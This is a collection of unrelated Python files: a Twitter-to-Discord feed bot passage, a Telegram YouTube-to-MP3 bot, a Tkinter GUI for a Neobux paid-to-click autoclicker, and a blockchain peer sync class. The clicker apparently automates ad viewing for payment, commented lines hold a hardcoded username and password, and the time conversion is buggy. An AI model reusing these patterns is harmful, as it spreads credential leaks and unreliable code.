text = "Exception caught retrieving data:"
date = e
queue_wrapper.push_tweet_id_to_queue(self._tweet.id)
print(f"Pushed tweet ID to queue...")
return text, date, handle, followers, following, username, icon_url, thumbnail_url, website_url, twitter_url, img_url
def get_dynamic_data(self, tweet=None):
"""
:param tweet: For tweets retrieved manually
:return: dynamic data (will poll this method semi frequently)
:returns: favorites, retweets
Return None if tweet was not stored earlier
"""
if tweet is not None: # If tweet was already discovered
self._tweet = tweet
if self._tweet is None:
return None
retweets = self._tweet.retweet_count
if hasattr(self._tweet, "retweeted_status"):
favorites = self._tweet.retweeted_status.favorite_count
else:
favorites = self._tweet.favorite_count
return favorites, retweets
def _get_tweet_from_data(self, data, tweet_index=None):
"""
:return: tweet if data was pulled manually (from client.profile)
or automatically (from stream listener)
"""
if hasattr(data, 'timeline()') or tweet_index is not None: # !tweet tweets
tweet = data.timeline()[tweet_index]
return tweet
raw_tweet_data = json.loads(data) # !populate tweets
if hasattr(raw_tweet_data, 'id') or 'id' in raw_tweet_data: # Or streamed tweets
raw_tweet_id = int(raw_tweet_data['id'])
tweet = client.api.get_status(id=raw_tweet_id, tweet_mode='extended')
return tweet
return None # Return non if tweet is unretweeted/retweeted
def _convert_from_military_to_normal(self, datetime_obj, is_utc=False):
"""
:param datetime_obj: the tweet object associated with the datetime object
:param is_utc: streamed tweet objects return the time in UTC. This timezone
is offset by an additional 4 hours, and should require processing to indicate so.
:return: military time converted to normal time, also with PM or AM
"""
military = datetime.datetime.time(datetime_obj).strftime('%H:%M')
hour = int(military[0] + military[1])
if is_utc:
# TODO: Fix 4 hour UTC offset
return datetime.datetime.time(datetime_obj).strftime(f'{hour}:%M (UTC)')
if hour in range(13, 24):
hour -= 16
time_of_day = "P.M."
else:
time_of_day = "A.M."
final_conversion = datetime.datetime.time(datetime_obj).strftime(f'{hour}:%M {time_of_day}')
return final_conversion
def _convert_from_datetime_string_to_object(self, raw_date_string):
"""
:param raw_date_string: the json string
to convert to datetime object
:return: the string turned into a datetime object
as *user's* tweet.created_at datetime format
Turning it into the tweet format will allow it to
be converted from military time to normal time,
as seen when done so manually.
"""
datetime_format = datetime.datetime.strptime(raw_date_string, '%a %b %d %H:%M:%S %z %Y').strftime('%Y-%m-%d %H:%M:%S')
tweet_format = datetime.datetime.strptime(datetime_format, '%Y-%m-%d %H:%M:%S')
return tweet_format
def _get_full_text(self):
"""
:return: the full text if found, will be truncated otherwise
Note: a tweet from GET endpoint does not have an
extended_text field. The tweet has to be searched
again using some api.search method.
Opted for api.get_status(id=id, tweet_mode=mode)
"""
tweet_id = int(self._tweet.id)
if hasattr(self._tweet, "text"):
normal_text = self._tweet.text # TODO: Retweets from stream don't have this?
else:
return self._tweet.full_text
search_result = client.api.get_status(id=tweet_id, tweet_mode='extended')
if search_result is None or search_result == "" or search_result == " ":
return normal_text
return search_result.full_text
def _is_retweet(self, tweet):
"""
:param tweet: They either start with RT
or retweeted is set to True.
:return: True if retweet, false otherwise
"""
if hasattr(tweet, "retweeted_status"):
return True
# elif tweet.retweeted_status is not None or tweet.retweeted is True:
# return True
return False
def _adjust_fields_for_retweet(self, text):
"""
:param text: the text for adjustments
All other properties are retrieved from self._tweet.
:return: tuple data in the following order:
:returns: text, handle, twitter_url
"""
root_screen_name = self._tweet.author.screen_name # Root user
retweet_screen_name = self._tweet.retweeted_status.user.screen_name # Retweet user
handle = f"retweet from @{retweet_screen_name}"
for index in self._tweet.retweeted_status.entities["urls"]:
if "twitter" in str(index):
text += "\n\n**View full retweet:** __" + index["url"] + "__"
break
if str(text).startswith(f"RT @{root_screen_name}:"):
text = text.replace(f"RT @{root_screen_name}:", "*(Self retweet)*")
else:
text = text.replace("@" + root_screen_name, "**@" + root_screen_name + "**", 1).replace(f"RT @{retweet_screen_name}: ", "", 1)
if "@" + root_screen_name in text:
text = str(text).replace("@" + root_screen_name, "**@" + root_screen_name + "**", 1)
handle = "mention in " + handle
handle = handle[:1].upper() + handle[1:] # Capitalizes first letter while *retaining remaining case*
twitter_url = f"https://www.twitter.com/{retweet_screen_name}"
return text, handle, twitter_url
class TweetQueueWrapper:
def __init__(self):
self.queue = OrderedDict()
self.is_populating = False # So poller will update tweets in order
def push_tweet_id_to_queue(self, tweet_id):
"""
:param tweet_id: note that raw tweet
objects are considered unhashable,
at least for ordered dicts.
Better to stored the ID, as we'll be
repeatedly searching for tweets based
on the ID.
"""
self.queue[tweet_id] = None # Values will be added later
def insert_message_last_item(self, message):
self.queue.update({next(reversed(self.queue)): message})
def is_empty(self):
if not self.queue or bool(self.queue) is False:
return True
return False
def clear_queue(self):
self.queue = self.queue.clear()
def remove_tweet_from_queue(self, tweet_id):
self.queue.pop(tweet_id)
async def push_message_to_tweet_queue(self, message):
if not message.embeds and (message.channel is not listener.social_media_channel):
return
if message.embeds[0].author.name != client.profile.name:
return
while True:
if queue_wrapper.is_empty():
continue
queue_wrapper.insert_message_last_item(message)
await asyncio.sleep(0.01)
print(f"Pushed message to queue...")
break
class Poll:
def __init__(self):
self.is_polling = False
self._poll_rate = 1 # In seconds
self._num_retries = 5 # If poll error
async def poll_for_data_from_stream(self, client):
"""
A workaround for asynchronous function unable to
be threaded. This is function is called *last* at
on_ready(). Bot remains operable.
Reasoning: embeds need to be awaited.
Listener pipeline is NOT asynchronous,
which means embed sending can't be
awaited there.
This (asynchronous) function polls any data
that was stored from the pipeline in
2 second intervals.
"""
listener.social_media_channel = utils.get_social_media_feed_channel(client.guild)
listener.commands_channel = utils.get_bot_commands_channel(client.guild)
listener.error = None # Assuming a user does this manually, this needs to clear
print(f"Polling for stream...")
await listener.commands_channel.send(f"Started Twitter feed.")
self.is_polling = True
while True:
try:
await asyncio.sleep(self._poll_rate)
if listener.static_data and listener.dynamic_data:
await embed_and_send(listener.static_data, listener.dynamic_data)
listener.static_data = None
listener.dynamic_data = None
elif listener.error:
await listener.commands_channel.send(f"Twitter poll error: `{listener.error}`\n*Unable to update Twitter feed*. Please retry in __15__ minutes, or refer to the Twitter API response codes for more info.")
self.is_polling = False
break
else:
print(f"No messages in stream listener. Retrying in 5 seconds. Error: {listener.error}")
await asyncio.sleep(5)
except Exception as e:
if self._num_retries == 0:
await listener.commands_channel.send(f"Some unknown exception was caught trying to poll stream. {self._num_retries} retries remaining!\nError: `{e}`")
else:
await listener.commands_channel.send(f"`{self._num_retries}` remaining...")
print(f"Some unknown exception caught trying to poll stream, retrying!:\n\n{e}")
if self._num_retries > 0:
self._num_retries -= 1
continue
else:
self.is_polling = False
listener.error = e
owner = discord.utils.get(client.guild.members, id=int(config['id']['owner']))
await listener.commands_channel.send(f"{owner.mention}, unable to start poller after 5 retries. See `!metrics` for more information")
break
async def poll_for_tweet_updates(self):
print(f"Polling for updates... (Populating: {queue_wrapper.is_populating} | Queue status: {queue_wrapper.queue})")
while True:
await asyncio.sleep(self._poll_rate)
if queue_wrapper.is_populating or queue_wrapper.is_empty():
continue
console_color_green = '\033[92m'
console_color_normal = '\033[0m'
queue_copy = copy.copy(queue_wrapper.queue)
# CRITICAL NOTE: Looping through a dictionary while deleting
# its keys (regardless of where) will permanently block
# the polling process. Loop through a copy instead,
# then delete keys from the original reference.
# (No exceptions are caught either. It's just a
# nuance with async functions)
for tweet_id, msg in queue_copy.items():
if msg is None:
print(F"\t(Waiting for message(s) to be pushed or queued!)")
continue
print(f"\t{console_color_green}Updating next popped tweet | Queue length: {len(queue_wrapper.queue)} | ID: {tweet_id}{console_color_normal} ")
await self._update_tweet(tweet_id, msg)
async def _update_tweet(self, tweet_id, message):
"""
:param tweet_id: IDs were pushed to the
OrderedDict, not the raw tweet objects
:param message: Await message.edit from here
Twitter API gives you 900 show_id and
user_timeline requests.
=======================================
From: api.rate_limit_status()
Location: ['resources']['statuses']
['/statuses/user_timeline'] or ['/statuses/show/:id']
Then: ['limit'] or ['remaining']
LIMITATION: Tweets retrieved in quick succession will have to
wait their turn to be updated. These functions are asynchronous,
not threaded.
"""
counter = 0
update_rate = 1
while counter < 3:
print(f"\tGetting tweet from id {tweet_id}... ({counter}/3)")
await asyncio.sleep(update_rate)
tweet = client.api.get_status(id=tweet_id, tweet_mode='extended')
print(f"\tTweet captured...")
rates_id = client.get_rates_id()
print(f"\tRates captured...")
favorites, retweets = tweet_data_wrapper.get_dynamic_data(tweet)
embed = message.embeds[0]
if embed is None:
print(f"\tEmbed is none!")
embed.set_footer(text=f"💬 0 | 👍 {favorites} | ❤️{favorites} | 🔄 {retweets} • Custom feed developed by Lawrence Chiappelli")
await message.edit(embed=embed)
counter += 1
print(f"\t\tFINISHED UPDATING TWEET!")
del queue_wrapper.queue[tweet_id]
return
async def embed_and_send(static_data, dynamic_data):
"""
:param static_data: tuple of data that never changes
:param dynamic_data: tuple of data that semi-frequently changes
:return: if the designated channel is none, otherwise send embed
Note: replies are part of the premium API.
"""
text, date, handle, followers, following, username, icon_url, thumbnail_url, website_url, twitter_url, img_url = static_data
favorites, retweets = dynamic_data
embed = discord.Embed(title=f"__{handle}__", url=twitter_url, description=f"{following} following | {followers} followers", color=0x8080ff)
embed.set_author(name=username, icon_url=icon_url, url=website_url)
embed.set_thumbnail(url=thumbnail_url)
embed.add_field(name=date, value=text, inline=False)
embed.set_footer(text=f"💬 0 | 👍 {favorites} | ❤️{favorites} | 🔄 {retweets} • Custom feed developed by Lawrence Chiappelli")
if img_url is not None:
embed.set_image(url=img_url)
try:
await listener.social_media_channel.send(embed=embed)
except Exception as e:
warnings.warn(f"Unable to find the social media channel for tweets!:\n{e}")
async def populate_channel_with_tweets(context):
debug_channel = utils.get_bot_commands_channel(context.guild)
num_tweets = 20
queue_wrapper.is_populating = True
while num_tweets != 0:
try:
static_data = tweet_data_wrapper.get_static_data(client.profile, num_tweets-1)
dynamic_data = tweet_data_wrapper.get_dynamic_data()
await embed_and_send(static_data, dynamic_data)
await debug_channel.send(f"✅ Tweet {num_tweets-1} retrieved and sent successfully.")
except Exception as e:
await debug_channel.send(f"❌ Tweet {num_tweets-1} retrieved unsuccessfully:\n<{e}>")
num_tweets -= 1
await asyncio.sleep(1)
queue_wrapper.is_populating = False
async def get_last_tweet():
"""
:return: nothing
For debugging purposes- gets the last tweet of the
currently hardcoded user ID.
"""
static_data = tweet_data_wrapper.get_static_data(client.profile, 0)
dynamic_data = tweet_data_wrapper.get_dynamic_data()
await embed_and_send(static_data, dynamic_data)
twitter_poller = Poll() # Cut+paste to worker if this should automatically start
tweet_data_wrapper = TweetDataRetrieverWrapper()
queue_wrapper = TweetQueueWrapper()
config = configutil.get_parsed_config()
listener = StdOutListener()
profile = TweepyClient().api.get_user(TweepyClient().user_id) # To make a single API call
client = TweepyClient(profile) # Now initialized the client with one profile
thread = threading.Thread(target=listener.thread_stream, args=[])
# TODO: Confirm if the following is needed to retrieve the instances' data
# The motivation for this was due to getting conflicting results with both options
# for server metrics. This may be a symptom of a deeper problem somewhere.
# TODO: If so, it might be better to access the instance directly
# instead of calling a function from the module.
def force_thread_start_for_auth():
"""
:return:
Motivation: in instances
where 420 error occurs, users
can type the necessary command
to connect the stream account.
This may happen during each initial
bot run instance.
Rate limits reset after 15 minutes.
"""
thread.start()
# --------------#
thread.start() # Comment / uncomment during development!! (Or keep in mind rate limits when testing)
# --------------#
|
bot.py
|
import os
import youtube_dl
import telepotpro
from random import randint
from multiprocessing import Process
from youtubesearchpython import VideosSearch
from dotenv import load_dotenv
from os.path import join, dirname
dotenv_path = join(dirname(__file__), '.env')
load_dotenv(dotenv_path)
TOKEN = os.environ.get("TOKEN")
bot = telepotpro.Bot(TOKEN)
class Music:
def __init__(self, user_input, msg):
self.chat = Chat
self.user_input = user_input[6:]
def search_music(self, user_input):
return VideosSearch(user_input, limit = 1).result()
def get_link(self, result):
return result['result'][0]['link']
def get_title(self, result):
return result['result'][0]['title']
def get_duration(self, result):
result = result['result'][0]['duration'].split(':')
min_duration = int(result[0])
split_count = len(result)
return min_duration, split_count
def download_music(self, file_name, link):
ydl_opts = {
'outtmpl': './'+file_name,
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '256',
}],
'prefer_ffmpeg': True
}
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
info_dict = ydl.extract_info(link, download=True)
pass
class Chat:
def __init__(self, msg):
self.chat_id = msg['chat']['id']
self.user_input = msg['text']
self.user_input = self.user_input.replace('@TLMusicDownloader_bot', '')
self.user_name = msg['from']['first_name']
self.message_id = msg['message_id']
self.messages = {
'start':'🤖 Hello, '+ self.user_name +'!\n\n'
'📩 Send me:\n\n'
'"*/Song* _song name_" or\n'
'"*/Song* _musician name - song name_"\n\n'
'to order some music. 🎶',
'spotify_input_error':"‼️ *Oops! The bot doesn't support Spotify links!*\n"
'Try: "*/Song* _song name_"\n'
'or: "*/Song* _musician name - song name_"',
'invalid_command':'‼️ *Oops! Invalid command!*\n'
'Try: "*/Song* _song name_"\n'
'or: "*/Song* _musician name - song name_"',
'too_long':'‼️ *Oops! Video too long to convert!*\n'
'Order something 30 minutes or less.'
}
self.check_input(self.user_input, msg)
pass
def send_message(self, content):
return bot.sendMessage(self.chat_id, content, reply_to_message_id=self.message_id, parse_mode='Markdown')
def delete_message(self, message):
chat_id = message['chat']['id']
message_id = message['message_id']
bot.deleteMessage((chat_id, message_id))
pass
def send_audio(self, file_name):
bot.sendAudio(self.chat_id,audio=open(file_name,'rb'), reply_to_message_id=self.message_id)
pass
def process_request(self, user_input):
result = Music.search_music(self, user_input[6:])
min_duration, split_count = Music.get_duration(self, result)
if int(min_duration) < 30 and split_count < 3:
file_name = Music.get_title(self, result) +' - @TLMusicDownloader_bot '+str(randint(0,999999))+'.mp3'
file_name = file_name.replace('"', '')
self.send_message(f"🎵 {Music.get_title(self, result)}\n🔗 {Music.get_link(self, result)}")
downloading_message = self.send_message('⬇️ Downloading... \n_(this may take a while.)_')
Music.download_music(self, file_name, Music.get_link(self, result))
try:
self.send_audio(file_name)
self.delete_message(downloading_message)
self.send_message('✅ Sucess!')
print ("\nSucess!\n")
except:
print("\nError")
os.remove(file_name)
pass
def check_input(self, user_input, msg):
if user_input.startswith('/start'):
self.send_message(self.messages['start'])
elif user_input.startswith('/music') and user_input[6:]!='':
if 'open.spotify.com' in user_input[6:]:
self.send_message(self.messages['spotify_input_error'])
else:
#Valid command
self.process_request(user_input)
else:
#Invalid command
self.send_message(self.messages['invalid_command'])
pass
def start_new_chat(msg):
Process(target=Chat, args=(msg,)).start()
bot.message_loop(start_new_chat, run_forever=True)
|
gui.py
|
from Neobux import Neobux
from Neobux import NeobuxPage
import tkinter
from tkinter import ttk
import multiprocessing
from PIL import Image
from PIL import ImageTk
from PIL.PngImagePlugin import PngImageFile
from urllib.request import Request, urlopen
from base64 import b64decode
from io import BytesIO
import webbrowser
def build_Neobux_driver(connection):
Neobux(None, True, connection).mainloop()
class LabeledEntry(ttk.Frame):
def __init__(self, master = None, label = None, showinput = True, exportselection = 1):
ttk.Frame.__init__(self, master)
self.label = ttk.Label(self, text = label, font = ("Segoe UI", -16))
self.label.grid(row = 0, column = 0)
self.entry = ttk.Entry(self, exportselection = exportselection, font = ("Trebuchet MS", -14, "bold"))
if not showinput:
self.entry["show"] = u"\u2022"
self.entry.grid(row = 0, column = 1)
def get(self):
return self.entry.get()
def disable(self):
self.label.state(["disabled"])
self.entry.state(["disabled"])
def enable(self):
self.label.state(["!disabled"])
self.entry.state(["!disabled"])
class TableFrame(ttk.Frame):
def __init__(self, master = None, **options):
ttk.Frame.__init__(self, master, **options)
def format(self, rows, columns):
self.rows = rows
self.columns = columns
for i in range(self.rows):
self.rowconfigure(i, weight = 1)
for j in range(self.columns):
self.columnconfigure(j, weight = 1)
cellname = "row" + str(i) + "column" + str(j)
setattr(self, cellname, ttk.Frame(self))
cell = getattr(self, cellname)
cell.grid(row = i, column = j, sticky = tkinter.NSEW)
cell.rowconfigure(0, weight = 1)
cell.columnconfigure(0, weight = 1)
def update(self, data):
self.data = data
self._label_table()
self._populate_table()
def _label_table(self):
for i in range(self.rows):
cell = getattr(self, "row" + str(i) + "column0")
cell.label = ttk.Label(cell, text = list(self.data.keys())[i])
cell.label.grid(sticky = tkinter.W)
def _populate_table(self):
for i in range(self.rows):
if self.columns == 2:
cell = getattr(self, "row" + str(i) + "column1")
cell.label = ttk.Label(cell, text = list(self.data.values())[i])
cell.label.grid(sticky = tkinter.E)
else:
for j in range(1, self.columns):
cell = getattr(self, "row" + str(i) + "column" + str(j))
cell.label = ttk.Label(cell, text = list(list(self.data.values())[i].values())[j - 1])
cell.label.grid(sticky = tkinter.E)
class NeobuxLoadingGraphic(tkinter.Canvas):
LOADING_IMAGE_BASE64 = ("iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAACuklEQVRYhcWXoW/iUBzH39+AQC2E"
"VCCqSFOBQqAqUBNViKoKVEUVAlWBqqpAIJ5CVBAEqoJkC4yVDdiNIwOyscDWjG0sd7vMf08svNDb"
"kuMubfdLvmlVP5/3e7/3khKyZzUeGzAWBuSxDMEVwPd4xI/jEFwB+37jv4p6FPJYRqKTQOwohthR"
"DPHjOOLHcfYeCthe21AmCrguh4POAYPuJnYUQ26QC16AehTZ8ywSncSHfCYSKNxaWeB7PLgut5eA"
"NJKCE6AeheAK4LocE0h2kz545iwDZaJAn+swlybMpRmMQOOxgdwgh9RJClyXQ+okhWQ3yZI9z8Ja"
"WeFNfHFaBN/jkTpJ+cJ1OehzPfyjlnbT4Hu8T4Lv8TAWRrhwQghRr1Sk3bRPgu/x4a+ckPfzLvZF"
"pN00BFdgz8Nvh+HDCSHEWBgMLPZFCK4AwRXCHbjdUiYKg4p9EWJfDPZs/63yF3lkzjK+aDMtOoHs"
"eRa7yZxlULmtfJ1AbpBD9a76tQKRDSAhhEgjCblBDtJIYgnsft+n5LHsg0sjCeWbcnQC2kzzwfMX"
"eSgTJToBc2ky8PYpj2VQj0YjYa9t5C/yLPJYhjyWo70L9Lnugxe+F6BMlOiGsf5QZ/BdAWWiRLcV"
"xsJA4XuBwdUrFeqVCm2moXZfC1+i+dSEeqV+KlC6LsFcmmg9t8IVqT/UWeuViQJtpkGf6yhdl1C+"
"KcNcmqAeRfOpifZLG8PXIS5/XWL6NsX0bRqMHPUoitMiW/1WwFgYqNxWYK0sVO+qqD/U0Xxqwtk4"
"OP15iuHrMDgJe22jdF36IGAsDFgrC7X7GuuEs3HQ+dEJVoCQ95mwVpZPYPsfUL2rgnoU9tpG67mF"
"9ks7+C78KbLdAnNpwlpZoB79tAvbmQhUghBCnI0De22DepRtAfUoGo8NOBuHDeW/wn8DCAIBcTEu"
"hj0AAAAASUVORK5CYII=")
def __init__(self, master = None):
tkinter.Canvas.__init__(self, master, height = 32, width = 32, highlightthickness = 0)
self.rotate_loading_graphic = self._update_loading_animation().__next__
self.rotate_loading_graphic()
def _update_loading_animation(self):
loading_image = Image.open(BytesIO(b64decode(NeobuxLoadingGraphic.LOADING_IMAGE_BASE64)))
angle = 0
while True:
self.loading_frame = ImageTk.PhotoImage(loading_image.rotate(angle))
canvas_object = self.create_image(0, 0, image = self.loading_frame, anchor = tkinter.NW)
self.after(58, self.rotate_loading_graphic)
yield
self.delete(canvas_object)
angle -= 15
angle %= 360
class LoginPrompt(ttk.Frame):
def __init__(self, master = None, submit = None):
ttk.Frame.__init__(self, master)
ttk.Style().configure("Error.TLabel", foreground = "red")
self.login_label = ttk.Label(self, text = "Neobux Member Login", font = ("Verdana", -20, "bold"))
self.login_label.grid(row = 0, column = 0)
self.login_status = ttk.Label(self, style = "Error.TLabel")
self.login_status.grid(row = 1, column = 0, pady = (10,5))
self.username_entry = LabeledEntry(self, "Username: ")
self.username_entry.grid(row = 2, column = 0, pady = (0,1), sticky = tkinter.E)
self.password_entry = LabeledEntry(self, "Password: ", False, 0)
self.password_entry.grid(row = 3, column = 0, pady = (0,1), sticky = tkinter.E)
self.secondary_password_entry = LabeledEntry(self, "Secondary Password: ", False, 0)
self.secondary_password_entry.grid(row = 4, column = 0, pady = (0,1), sticky = tkinter.E)
self.login_submit = ttk.Button(self, text = "Submit", command = submit)
self.login_submit.grid(row = 5, column = 0, pady = (10, 5))
def disable(self):
self.login_status["text"] = ""
self.username_entry.disable()
self.password_entry.disable()
self.secondary_password_entry.disable()
def enable(self):
self.username_entry.enable()
self.password_entry.enable()
self.secondary_password_entry.enable()
def set_status(self, status = ""):
self.login_status["text"] = status
def get(self):
username = self.username_entry.get()
password = self.password_entry.get()
secondary_password = self.secondary_password_entry.get()
return username, password, secondary_password
class CaptchaPrompt(ttk.Frame):
def __init__(self, master = None, submit = None):
ttk.Frame.__init__(self, master)
self.captcha_label = ttk.Label(self, text = "Verification", font=("Verdana", -20, "bold"))
self.captcha_label.grid(row = 0, column = 0, columnspan = 2)
self.captcha_description = ttk.Label(self, text = "Enter the letters you see below:\n", justify = tkinter.CENTER)
self.captcha_description.grid(row = 1, column = 0, columnspan = 2, pady = (15, 5))
self.captcha = ImageTk.PhotoImage(file = "example captcha.png")
self.captcha_image = ttk.Label(self, image = self.captcha)
self.captcha_image.grid(row = 2, column = 0, padx = (0, 3))
self.captcha_entry = ttk.Entry(self, font = ("Verdana", -15), width = 9)
self.captcha_entry.grid(row = 2, column = 1)
self.captcha_submit = ttk.Button(self, text = "Submit", command = submit)
self.captcha_submit.grid(row = 3, column = 0, columnspan = 2, pady = (10, 5))
def set_captcha(self, captcha):
if isinstance(captcha, ImageTk.PhotoImage):
self.captcha = captcha
if isinstance(captcha, PngImageFile):
self.captcha = ImageTk.PhotoImage(captcha)
def set_status(self, status):
self.captcha_label["text"] = "Enter the letters you see below:\n" + status
def get(self):
return self.captcha_entry.get()
class AuthenticationPrompt(ttk.Frame):
def __init__(self, master = None, submit = None):
ttk.Frame.__init__(self, master)
self.authentication_label = ttk.Label(self, text = "Two-Factor Authentication", font = ("Verdana", -20, "bold"))
self.authentication_label.grid(row = 0, column = 0)
self.authentication_description = ttk.Label(self, text = "Enter the six digits given by your authenticator app:\n")
self.authentication_description.grid(row = 1, column = 0, pady = (15, 5))
self.authentication_entry = ttk.Entry(self, font = ("Verdana", -16), width = 10)
self.authentication_entry.grid(row = 2, column = 0)
self.authentication_submit = ttk.Button(self, text = "Submit")
self.authentication_submit.grid(row = 3, column = 0, pady = (10, 5))
def set_status(self, status):
self.captcha_label["text"] = "Enter the six digits given by your authenticator app:\n" + status
def get(self):
return self.authentication_entry.get()
class ClickerDashboard(tkinter.Frame):
def __init__(self, master = None):
# Initial Window Setup
tkinter.Frame.__init__(self, master)
icon = ImageTk.PhotoImage(data = b64decode(Neobux.FAVICON_BASE64))
self.master.iconphoto(False, icon)
self.master.title("Neobux Clicker")
# Generate Tab Group
self.tabgroup = ttk.Notebook(self)
self.tabgroup.grid(row = 3, sticky = tkinter.NSEW)
# Banner Initialization
req = Request('https://www.neobux.com/imagens/banner7.gif', headers={'User-Agent': 'Mozilla/5.0'})
self.banner = ImageTk.PhotoImage(data = urlopen(req).read())
self.linked_banner = tkinter.Button(self, bd = 0, highlightthickness = 0,
relief = tkinter.FLAT, image = self.banner, cursor = "hand2",
command = lambda : webbrowser.open_new("https://www.neobux.com/?rh=446A61656E6B"))
self.linked_banner.grid(row = 0, column = 0, columnspan = 2, pady = (0, 5))
# Advertisements Table
self.advertisements = TableFrame(self)
self.tabgroup.add(self.advertisements, text = "Advertisements")
self.advertisements.format(8, 2)
self.advertisements.refresh = ttk.Button(self.advertisements, text = "Refresh")
self.advertisements.refresh.grid(row = 9, column = 0, columnspan = 2)
# Summary Table
self.summary = TableFrame(self)
self.tabgroup.add(self.summary, text = "Account")
self.summary.format(6, 2)
self.summary.refresh = ttk.Button(self.summary, text = "Refresh")
self.summary.refresh.grid(row = 7, column = 0, columnspan = 2)
# Statistics Table
self.statistics = TableFrame(self)
self.tabgroup.add(self.statistics, text = "Statistics")
self.statistics.format(6, 3)
self.statistics.refresh = ttk.Button(self.statistics, text = "Refresh")
self.statistics.refresh.grid(row = 7, column = 0, columnspan = 3)
# Clicker Interface
self.start = ttk.Button(self, text = "Start")
self.interface = ttk.Frame(self)
self.interface.login = ttk.Button(self.interface, text = "Login")
self.interface.login.grid(row = 0, column = 0)
self.interface.start = ttk.Button(self.interface, text = "Start")
self.interface.start.grid(row = 1, column = 0)
self.interface.stop = ttk.Button(self.interface, text = "Stop")
self.interface.stop.grid(row = 2, column = 0)
# self.interface_connection, self.driver_connection = multiprocessing.Pipe()
# self.driver = multiprocessing.Process(target = build_Neobux_driver, args = (self.driver_connection, ))
# self.driver.start()
self.interface.grid(row = 1, column = 0)
self.grid()
def update_advertisements(self, dict):
dict = {
"stale" : 0,
"unique" : 0,
"fixed" : 0,
"micro" : 0,
"mini" : 0,
"standard" : 0,
"extended" : 0,
"adprize" : 0
}
self.advertisements.update(dict)
def update_summary(self, dict):
dict = {
"membership" : "",
"member since" : "",
"seen advertisements" : 0,
"main balance" : 0,
"rental balance" : 0,
"points" : 0
}
self.summary.update(dict)
def update_statistics(self, dict):
dict = {
"unique" : {"Clicks" : 0, "Average" : 0},
"fixed" : {"Clicks" : 0, "Average" : 0},
"micro" : {"Clicks" : 0, "Average" : 0},
"mini" : {"Clicks" : 0, "Average" : 0},
"standard" : {"Clicks" : 0, "Average" : 0},
"extended" : {"Clicks" : 0, "Average" : 0}
}
self.statistics.update(dict)
def disable(self):
self.advertisements.refresh.state(["disabled"])
self.summary.refresh.state(["disabled"])
self.statistics.refresh.state(["disabled"])
def enable(self):
self.advertisements.refresh.state(["!disabled"])
self.summary.refresh.state(["!disabled"])
self.statistics.refresh.state(["!disabled"])
class NeobuxGUI(tkinter.Frame):
"""Tkinter-based GUI for interacting with a Neobux autoclicker"""
def __init__(self, title = "clicker"):
tkinter.Frame.__init__(self)
icon = ImageTk.PhotoImage(data = b64decode(Neobux.FAVICON_BASE64))
self.master.iconphoto(False, icon)
self.master.title(title)
self.config(bg = "white")
self._init_widgets()
self.grid_rowconfigure(0, weight = 1)
self.grid_rowconfigure(2, weight = 1)
self.grid_columnconfigure(0, weight = 1)
self.grid_columnconfigure(2, weight = 1)
# self.interface_connection, self.driver_connection = multiprocessing.Pipe()
# self.driver = multiprocessing.Process(target = build_Neobux_driver, args = (self.driver_connection, ))
# self.driver.start()
self.advertisements.grid(row = 1, column = 1)
self.grid()
def _init_widgets(self):
self.prompt_frame = ttk.Frame(self, width = 400, height = 225)
self.prompt_frame.grid_rowconfigure(0, weight = 1)
self.prompt_frame.grid_rowconfigure(2, weight = 1)
self.prompt_frame.grid_columnconfigure(0, weight = 1)
self.prompt_frame.grid_columnconfigure(2, weight = 1)
self.prompt_frame.grid_propagate(False)
self.loading_animation = NeobuxLoadingGraphic()
self.authentication_prompt = AuthenticationPrompt(self.prompt_frame)
self.captcha_prompt = CaptchaPrompt(self.prompt_frame, self.authentication_prompt.grid)
self.login_prompt = LoginPrompt(self.prompt_frame, self.captcha_prompt.grid)
self.advertisements = ClickerDashboard(self)
def show_prompt(self, prompt):
for child in self.prompt_frame.winfo_children:
child.grid_forget()
prompt.grid(row = 1, column = 1)
def neobux_login(self):
self.loading_animation.place()
self.login_prompt.disable()
# username, password, secondary_password = self.login_prompt.get_creds()
# self.interface_connection.send(("data", "username", username))
# self.interface_connection.send(("data", "password", password))
# self.interface_connection.send(("data", "secondary_password", secondary_password))
# self.loading_animation.grid(row = 1, column = 0)
# self.interface_connection.send(("data", "page"))
# page = self.interface_connection.recv()
# if page == NeobuxPage.LOGIN:
# self.interface_connection.send(("data", "login_error"))
# self.login_status.config(text = self.interface_connection.recv())
# elif page == NeobuxPage.VERIFICATION:
# self.login_prompt.grid_forget()
# elif page == NeobuxPage.VIEW:
# pass
# else:
# self.interface_connection.send(("method", "view_ads"))
# self.loading_animation.forget()
def destroy(self):
try:
self.interface_connection.send(("method", "exit_loop"))
except:
pass
return super().destroy()
if __name__ == "__main__":
clicker = ClickerDashboard()
clicker.update_advertisements(" ")
clicker.update_statistics(" ")
clicker.update_summary(" ")
clicker.mainloop()
# conn1, conn2 = multiprocessing.Pipe()
# process = multiprocessing.Process(target = build_Neobux_driver, args = (conn2, ))
# process.start()
# conn1.send(("method", "launch", ))
# conn1.send(("data", "username", "Djaenk"))
# conn1.send(("data", "password", "1234!@#$qwerQWER"))
# conn1.send(("data", "username"))
# print(conn1.recv())
# conn1.send(("data", "password"))
# print(conn1.recv())
# conn1.send(("method", "exit_loop"))
|
BlockChainManager.py
|
import threading
from time import sleep
import grpc
from qrl.core import logger
from qrl.generated import qrl_pb2
from qrl.services.PeerManager import PeerManager
class BlockChainManager(object):
def __init__(self, node, peer_manager):
self.node = node
self.peer_manager = peer_manager
self.thread = threading.Thread(target=self._synchronize_chain)
self.thread.daemon = True
self.thread.start()
def _block_received(self, response_future):
if response_future.code() == grpc.StatusCode.OK:
logger.info("[{:20}] _block_received {}".format(response_future.pm.conn_addr, response_future.index))
self._get_blockchain(response_future.pm, response_future.index + 1)
def _get_blockchain(self, peer_metadata, start_index):
req = qrl_pb2.GetBlockReq()
req.index = start_index
f = peer_metadata.stub.GetBlock.future(req, timeout=PeerManager.TIMEOUT_SECS)
f.pm = peer_metadata
f.index = start_index
f.add_done_callback(self._block_received)
def _synchronize_chain(self):
while True:
logger.info("Peers {:4} ({:4})".format(self.peer_manager.stable_peer_count,
self.peer_manager.peer_count))
for peer_metadata in self.peer_manager.stable_peers():
logger.info("{:20}: {:3}".format(peer_metadata.conn_addr,
peer_metadata.node_info.block_height))
for peer_metadata in self.peer_manager.stable_peers():
self._get_blockchain(peer_metadata, 0)
sleep(2)
|
create_images.py
|
#!/usr/bin/env python3
#
